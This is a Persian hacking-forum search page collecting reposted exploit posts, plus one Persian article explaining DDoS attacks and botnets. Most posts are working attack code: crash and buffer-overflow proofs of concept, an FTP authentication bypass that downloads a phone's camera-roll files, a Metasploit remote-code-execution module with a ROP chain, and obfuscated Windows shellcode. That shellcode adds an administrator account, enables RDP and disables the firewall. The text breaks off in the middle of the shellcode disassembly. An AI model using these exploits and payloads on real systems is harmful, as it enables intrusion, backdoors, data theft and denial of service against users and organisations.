امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'service'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

13 نتیجه پیدا شد

  1. # Exploit Title: Microsoft Windows Explorer Out-of-Bound read - Denial of Service (PoC) # Date: 2018-09-01 # Exploit Author: Ghaaf # Vendor Homepage: http://www.microsoft.com # Version: Windows 7(x86/x64) # Tested on: 6.1.7601 Service Pack 1 Build 7601 # CVE: N/A buffer = '' buffer += "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00" buffer += "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00" buffer += "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68" buffer += "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F" buffer += "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x69\x6E\x20\x44\x4F\x53\x20" buffer += "\x6D\x6F\x64\x65\x2E\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00" buffer += "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88" buffer += "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88" buffer += "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\x03\x00" buffer += "\xE8\x2D\x73\x54\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x0F\x01" buffer += "\x0B\x01\x06\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00" buffer += "\x68\x11\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\x00\x00\x40\x00" buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00" buffer += "\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x10\x00\x00" buffer += "\xB2\xEA\x00\x00\x02\x00\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00" buffer += "\x00\x00\x10\x00\x00\x10\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x94\x1A\x00\x00\x28\x00\x00\x00" buffer += "\x00\x30\x00\x00\xA4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x28\x02\x00\x00\x20\x00\x00\x00" buffer += "\x00\x10\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x2E\x74\x65\x78\x74\x00\x00\x00\x38\x0D\x00\x00\x00\x10\x00\x00" buffer += "\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x20\x00\x00\x60\x2E\x64\x61\x74\x61\x00\x00\x00" buffer += "\xE0\x09\x00\x00\x00\x20\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00" buffer += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\xC0" buffer += "\x2E\x72\x73\x72\x63\x00\x00\x00\xA4\x08\x00\x00\x00\x30\x00\x00" buffer += "\x00\x10\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" buffer += "\x00\x00\x00\x00\x40\x00\x00\x40\x6C\xDA\x5B\x4A\x10\x00\x00\x00" open("poc.exe", "wb").write(buffer)
  2. # Exploit Title: D-Link DIR-615 - Denial of Service (PoC) # Date: 2018-08-09 # Vendor Homepage: http://www.dlink.co.in # Hardware Link: https://www.amazon.in/D-Link-DIR-615-Wireless-N300-Router-Black/dp/B0085IATT6 # Version: D-Link DIR-615 # Category: Hardware # Exploit Author: Aniket Dinda # Tested on: Linux (kali linux) # Web: https://hackingvila.wordpress.com/2018/08/24/d-link-dir-615-buffer-overflow-via-a-long-authorization-http-header-click-here/ # Cve: CVE-2018-15839 # Proof Of Concept: 1- First connect to this network 2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser. 3- Goto Easy setup > 4- Now as the Burp is intercept is on, you will find an Authorization: Basic or cookie: SessionId followed by a string. Now we paste a string consisting oaf 5000 zeros. 5- Then forward the connection 6- Then your router automatically log out and the net connection will be gone.
  3. #!/usr/bin/env python #================================================================================== # Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service # Date: 2015-05-25 # Exploit Author: Wh1t3Rh1n0 (Michael Allen) # Exploit Author's Homepage: http://www.mikeallen.org # Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302 # Version: 3.0 # Tested on: iPhone #================================================================================== # ------------------ # Denial of Service: # ------------------ # The FTP server does not properly handle errors raised by invalid # FTP commands. The following command, which sends an invalid PORT command to # the FTP server, will crash the server once it is received. # echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000 # ---------------------- # Authentication Bypass: # ---------------------- # The FTP server does not handle unauthenticated connections or incorrect login # credentials properly. A remote user can issue commands to the FTP server # without authenticating or after entering incorrect credentials. # The following proof-of-concept connects to the given FTP server and # downloads all files stored in the "Camera Roll" folder without providing a # username or password: import sys from ftplib import FTP if len(sys.argv) <= 1: print "Usage: ./ftp-nologin.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) files = [] def append_file(s): files.append(s.split(' ')[-1]) blocks = [] def get_blocks(d): blocks.append(d) ftp = FTP() print ftp.connect(host, port) ftp.set_pasv(1) ftp.cwd("Camera Roll") print ftp.retrlines('LIST', append_file) files.pop(0) for filename in files: print "Downloading %s..." % filename ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks) f = open(filename, 'wb') for block in blocks: f.write(block) f.close() print "[+] File saved to: %s" % filename blocks = [] ftp.quit()
  4. # Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC) # Exploit Author: Ali Alipour # Date: 2018-08-22 # Vendor Homepage : https://www.acunetix.com/ # Tested on : Windows 10 - 64-bit # Steps to Reproduce # Run the python exploit script, it will create a new # file with the name "exploit.txt" just copy the text inside "exploit.txt" # and start the Acunetix WVS Reporter 10.0 program. # In the new window click "Report Preview" > "Load Report". # And upload a sample report >> Then click on the print button . # Now Paste the content of "exploit.txt" into the field: " Pages ". # Click "OK" and you will see a Crash. #!/usr/bin/python buffer = "A" * 20 payload = buffer try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  5. # Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC) # Author: Gionathan "John" Reale # Discovey Date: 2018-08-29 # Homepage: https://www.hdtune.com/ # Software Link: https://www.hdtune.com/download.html # Tested Version: v1.0 # Tested on OS: Windows 7 32-bit # Steps to Reproduce: Run the python exploit script, it will create a new # file with the name "exploit.txt". Copy the content of the new file "exploit.txt". # Now start the program. Now when you are inside of the program click "File" > "Options". In the field: "Folder / filename" paste the copied content from "exploit.txt". # Now click "OK" and see a crash! #!/usr/bin/python buffer = "A" * 6000 payload = buffer try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  6. #Exploit Title: Trillian 6.1 Build 16 - "Sign In" Denial of service (PoC) #Discovery by: Jose Miguel Gonzalez #Discovery Date; 2018-08-29 #Vendor Homepage: https://www.trillian.im/ #Software Link: https://www.trillian.im/download/ #Tested Version: 6.1 Build 16 #Tested on OS: Windows 10 Single Language x64 #Steps to produce the crash #1.- Run the python code: trillian.py #2.- Open trillian.txt and copy context to clipboard #3.- Open Trillian application #4.- Paste clipboard on "Username" #5.- Put "1234" on "Password" #5.- Sign In #6.- Crashed mem = "\x41" * 214 f = open ("trillian.txt", "w") f.write(mem) f.close()
  7. # Exploit Title: ipPulse 1.92 - 'TCP Port' Denial of Service (PoC) # Discovery by: Diego Santamaria # Discovery Date: 2018-08-28 # Vendor Homepage: https://www.netscantools.com/ippulseinfo.html # Software Link: http://download.netscantools.com/ipls192.zip # Tested Version: 1.92 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional # Steps to Reproduce: # 1. Run the python code TCP_port.py # 2. Open TCP_exploit.txt and copy the content # 3. Open ipPulse.exe # 4. Choose 'Target Editor' # 5. write '1' in 'IP Adreess' # 6. Paste the content from exploit.txt on 'TCP Port' # 7. Press 'Add Above Fields to Target List' # 8. Press ok and Crashed #!/usr/bin/env python content = "\x41" * 4087 f = open ("TCP_exploit.txt", "w") f.write(content) f.close()
  8. Client

    آشنایی کامل با حملات تکذیب سرور denial of service (DDos) What is DDoS ? DDoS یا به طور کامل denial of service چیست بهتره با مفهموم denial of service اشنایی پیدا کنیم. حملات تکذیب سرویس نوعی از حملات سازمان یافته با هدف جلوگیری از بالا اومدن سرویس خاص به طور مثال جلوگیری از باز شدن سایت برای سایر بازدید کنندگان حملات تکذیب سرور چطور اتفاق میفته ؟ Happens اغلب این حملات با ارسال اطلاعات بی فایده (بسته) به یک سرور در مقادیر بسیار عظیم انجام میشود. به طور مثل فرض کنید یک سایت یا سرور فقط توانایی اجرا سایت برای 100 سیستم یا کلاینت را دارا میباشد در صورتی که کاربران بازدید کننده از سایت بیشتر از 100 شد سایت از دسترس خارج خواهد شد و نمیتوان به سایت مراجعه نمود. به خاطر داشته باشید که اگر چه هدف وب سایت annoysec گسترش دانش کاربران میباشد ولی سو استفاده از حملات تکذیب سرور واقع یک جرم به حساب می آید. ٰروش های استفاده از تکذیب سرور Example Of DOS attack استفاده از command prompt (خیلی قدیمی شده) استفاده از سرور مجازی Vps استفاده از بات نت botnet و .. حتما با دستور ping کار کردید در گذشته با استفاده از این دستورات با سرعت مناسب و مطلوب اقدام به DDos یا تکذیب سرور کنید البته در حال حاضر این روش منسوخ شده سرور مجازی با توجه به قدرت و سرعت بالای اینترنت با نوشتن یک برنامه کاربردی و یا استفاده از نرم افزار اپدیت و جدید میتوان به حملات تکذیب سرور روی سرور خاص یا .. پرداخت همچنین توضیحات wikipedia در مورد باتنت ها بات‌نت‌ها شبکه‌هایی هستند که با در اختیار گرفتن مجموعه‌ای از کامپیوترها که بات(bot) نامیده می‌شوند، تشکیل می‌ شوند. این شبکه‌ها توسط یک و یا چند مهاجم که botmasters نامیده می‌شوند، با هدف انجام فعالیت‌های مخرب کنترل می‌گردند. به عبارت بهتر ربات‌ها کدهای مخربی هستند که بر روی کامپیوترهای میزبان اجرا می‌شوند تا امکان کنترل نمودن آن‌ها از راه دور را برای botmaster ها فراهم نمایند و آن‌ها بتوانند این مجموعه را وادار به انجام فعالیت‌های مختلف نمایند. به طور مثال مدیر سرور با اجرای یک فایل bat در کامپیوتر های مختلف اقدام به تکذیب سرور میکند. در مقالات بعدی به روش های جلوگیری و روش های مختلف اشاره خواهیم کرد.
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Advantech WebAccess 8.2. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code. }, 'Author' => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ], 'License' => MSF_LICENSE, 'References' => [ [ 'ZDI', '17-938' ], [ 'CVE', '2017-14016' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ] ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31', { 'Ret' => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14 'Slide' => 0x07048f5b, # retn 'Jmp' => 0x0706067e # pop ecx; pop ecx; ret 0x04 } ], ], 'DisclosureDate' => 'Nov 02 2017', 'DefaultTarget' => 0)) register_options([ Opt::RPORT(4592)]) end def create_rop_chain() # this target opts into dep rop_gadgets = [ 0x020214c6, # POP EAX # RETN [BwKrlAPI.dll] 0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll] 0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll] 0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll] 0x0201a646, # POP EBP # RETN [BwKrlAPI.dll] 0x07024822, # & push esp # ret [BwPAlarm.dll] 0x070442dd, # POP EAX # RETN [BwPAlarm.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x02030af7, # POP EAX # RETN [BwKrlAPI.dll] 0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx) 0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll] 0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll] 0x07078df5, # POP EAX # RETN [BwPAlarm.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x070467d2, # NEG EAX # RETN [BwPAlarm.dll] 0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll] 0x0706fe66, # POP EDI # RETN [BwPAlarm.dll] rand_text_alpha(4).unpack('V'), rand_text_alpha(4).unpack('V'), 0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll] 0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll] 0x90909090, # nop 0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll] ].flatten.pack("V*") return rop_gadgets end def exploit connect handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # send the request to get the handle resp = dcerpc.call(0x4, [0x02000000].pack('V')) handle = resp.last(4).unpack('V').first print_good("Got a handle: 0x%08x" % handle) egg_options = { :eggtag => "0day" } egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options) # apparently this is called a ret chain overflow = [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Jmp']].pack('V') overflow << [target['Ret']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << [target['Slide']].pack('V') overflow << create_rop_chain() overflow << egghunter overflow << egg overflow << rand_text_alpha(0x1000-overflow.length) # sorry but I dont like msf's ndr class. sploit = [handle].pack('V') sploit << [0x000138bd].pack('V') # opcode we are attacking sploit << [0x00001000].pack('V') # size to copy sploit << [0x00001000].pack('V') # size of string sploit << overflow print_status("Trying target #{target.name}...") begin dcerpc_call(0x1, sploit) rescue Rex::Proto::DCERPC::Exceptions::NoResponse ensure disconnect end handler end end
  10. import sys import datetime import socket import argparse import os import time remote_host = '' remote_port = '' def callExit(): print "\n\t\t[!] exiting at %s .....\n" % datetime.datetime.now() sys.exit(1) def mySocket(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) except socket.error: print 'Failed to create socket' sys.exit() print "\n\t[+] Socket Created" s.connect((remote_host, remote_port)) print "\n\t[+] Socket Connected to %s on port %s" % (remote_host, remote_port) return s # 250 backburner 1.0 Ready. def receiveBanner(s): banner = s.recv(4096) print banner def receiveData(s): data = s.recv(4096) print data def setDataCommand(s): receiveData(s) # backburner> print "Set Data Command" time.sleep(1) command = "set data\r\n" try: s.sendall(command) except socket.error: print 'Send failed' sys.exit() print "BackBurner Manager should have crashed" receiveData(s) # 200 Help receiveData(s) # Available Commands:.....and all set of commands # backburner> def main(): if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': os.system('clear') parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner') parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host') parser.add_argument('--port', nargs='?', dest='port', default=3234, help='remote Port running manager.exe') args = parser.parse_args() if args.host == None: print "\t[!] IP of remote host?" sys.exit() global remote_host global remote_port remote_host = args.host remote_port = args.port print "remote_host: %s" % remote_host print "remote_port: %s" % remote_port s = mySocket() receiveBanner(s) setDataCommand(s) print 'exit' sys.exit() if __name__ == '__main__': try: sys.exit(main()) except KeyboardInterrupt: callExit()
  11. #Author: Ali Razmjoo #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x64 [1218 Bytes].c /* #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate WinExec => 0x769e2c91 ExitProcess => 0x769679f8 ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push %ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb dc 7a a8 23 mov $0x23a87adc,%ebx 6a: ba 4d 56 36 55 mov $0x5536564d,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov $0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx 10f: ba 4d 56 36 55 mov $0x5536564d,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr $0x8,%eax 124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx 1ce: ba 4d 56 36 55 mov $0x5536564d,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor %edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 